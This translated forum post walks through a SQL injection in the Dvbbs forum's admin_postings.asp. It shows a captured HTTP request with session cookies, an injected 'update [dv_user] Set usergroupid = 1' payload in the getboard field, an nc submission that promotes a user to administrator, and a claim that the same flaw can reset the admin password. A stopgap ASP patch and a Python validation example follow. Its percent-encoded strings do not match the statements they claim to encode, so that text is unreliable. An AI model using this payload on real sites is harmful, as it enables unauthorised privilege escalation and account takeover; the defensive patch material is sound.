Source: Freezing Point Forum
First, find a board that has no pinned (topped) posts. No forum is entirely without pinned posts, right? Click into a board and check whether it has any.
Of course, the conditions for the vulnerability must be met: you have to be logged in as an administrator.
You do not need to go in as a front-end moderator; you only need to pin a post. Post anything at all, then click "Set pinned".
Pin it in normal mode.
At this point, pause and open the WSE packet-capture tool to capture the submitted post data. Then click Confirm.
Now let's see what WSE captured.
The intercepted submission is copied below:
POST /SQL/admin_postings.asp?action=istop HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.254/SQL/admin_postings.asp?action=istop
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; TencentTraveler; .NET CLR 1.1.4322)
Host: 192.168.1.254
Content-Length: 133
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 192%2e168%2e1%2e254%2fsql%2f=userid=1&usercookies=0&password=9pb621664s5w7il7&userhidden=2&userclass=%B9%DC%C0%ED%D4%B1&username=admin&statuserid=1929167667; ASPSESSIONIDCATQTATT=jjghmomdljjaafhagmlgomil; ASPSESSIONIDACTTRATS=nmlhlbbapmoiegaibmbfoimh; dvbbs=; upnum=0

istopaction=1&boardid=1&id=1&title=&content=A&dowealth=0&dousercp=0&douserep=0&msg=&ismsg=&getboard=1&submit=%C8%B7%C8%CF%B2%D9%D7%F7
What do we do now? Change getboard to: 1, 1); update [dv_user] Set usergroupid = 1 Where userid = 2; --
Before submitting it we first need to convert it to %XX (URL-encoded) form; use encoder.exe to convert it.
The result is as follows:
%31%2C%31%3B%29%75%70%64%61%5B%74%5f%65%20%64%76%75%5D%20%73%65%74%20%75%73%65%72%67%72%6f%75%70%69%3D%64%31%20%77%68%72%65%20%75%73%65%72%69%3D%64%3B%2D%20
Replace getboard = 1 with the injection statement. The statement moves the user whose userid is 2 into the administrator group (usergroupid = 1), although only as a front-end administrator. Then count the characters that were added to the body and change the value of Content-Length to 250. Submit the modified request with nc (netcat).
The idea is to feed the contents of a.txt to nc and save the returned response in 1.htm.
Take a look at our output in 1.htm:
Syntax error? Do you know why? As I said before, I did not count the Content-Length carefully.
The statement was cut off at: 1, 1); update [dv_user] Set usergroupid = 1 where user. So the statement did not execute completely. Right? But it doesn't matter. Let's change the length to 278 and try again.
The output in 1.htm is now:
See? Operation successful. The injection statement executed. Let's check the user with userid = 2.
The user name corresponding to userid = 2 is 619054. To save trouble, I go straight to the back-end admin panel to check whether this user's permission level is administrator.
Haha, it really has been upgraded to administrator. This vulnerability can not only escalate an ordinary user to administrator, it can also directly change the password of the back-end administrator. Serious enough? The official (Dvbbs) forum has released no patch so far. Really depressing.
-----------------------------------------------------------------------------------------------------------
The following temporary patch by yezhan, which blocks this vulnerability, has been posted on my site (http://532100.com), because no patch has been released officially. The severity of the problem needs no discussion.
First, I wrote a simple blocking patch: add a piece of code where the submitted getboard value is processed.
Code:

    If InStr("" & Request.Form("getboard") & "", "%75%70%64%61%74%65%5B%20%64%5f%76%75%73%65%5d%72%20%73%65%74%20%75%73%65%72%6f%67%72%75%70%3D") > 0 Then
        Response.Write "Do not use the latest vulnerability to inject attacks into this site."
        Response.End
    Else
        ' original code

Then add "End If" at the end of the file.
That is my idea.
Alternatively, you can replace admin_postings.asp with the modified file to block this vulnerability.
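As an added example (not the author's patch and not Dvbbs code), the same block done by type rather than by matching one encoded string: every field that the istop action uses as a number must parse as a plain integer, so a getboard value carrying anything else is rejected whatever encoding it arrives in. The field names are taken from the captured request above; the sample bodies are constructed.

```python
"""Type-based validation of the admin_postings.asp?action=istop form body.

Added example, not the author's patch or Dvbbs code. The field names come
from the captured request on this page; the sample bodies are constructed.
"""
import re
from urllib.parse import parse_qs, unquote

# Fields the istop action treats as numbers (taken from the capture).
NUMERIC_FIELDS = ("istopaction", "boardid", "id", "getboard",
                  "dowealth", "dousercp", "douserep")
# A plain integer: optional sign, 1-9 digits, nothing else (no ')', ';', '--').
INT_RE = re.compile(r"^[+-]?\d{1,9}$")


def validate_istop_body(body: str) -> dict:
    """Return {"ok": bool, "rejected": {field: decoded value}}.

    Keys are lower-cased because ASP's Request.Form is case-insensitive.
    parse_qs decodes %XX once; unquote runs a second pass so that a
    double-encoded value is judged on what the database would finally see.
    A field that is absent is not an error; only malformed values are.
    """
    params = {k.lower(): v
              for k, v in parse_qs(body, keep_blank_values=True).items()}
    rejected = {}
    for field in NUMERIC_FIELDS:
        for raw in params.get(field, []):
            value = unquote(raw).strip()
            if not INT_RE.match(value):
                rejected[field] = value
    return {"ok": not rejected, "rejected": rejected}


# Constructed sample bodies: BENIGN mirrors the captured 133-byte body,
# INJECTED carries the page's update statement in getboard.
BENIGN = ("istopaction=1&boardid=1&id=1&title=&content=A&dowealth=0"
          "&dousercp=0&douserep=0&msg=&ismsg=&getboard=1"
          "&submit=%C8%B7%C8%CF%B2%D9%D7%F7")
INJECTED = BENIGN.replace(
    "getboard=1",
    "getboard=1%2C1%29%3Bupdate%20%5Bdv_user%5D%20set%20usergroupid%3D1"
    "%20where%20userid%3D2%3B--")

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("injected", INJECTED)):
        print(name, validate_istop_body(body))
```

Note that ASP's Request.Form already URL-decodes form values, so a check against a percent-encoded literal such as the one in the patch above compares against text the server never sees in that form; an allow-list on the value's type sidesteps encoding questions entirely.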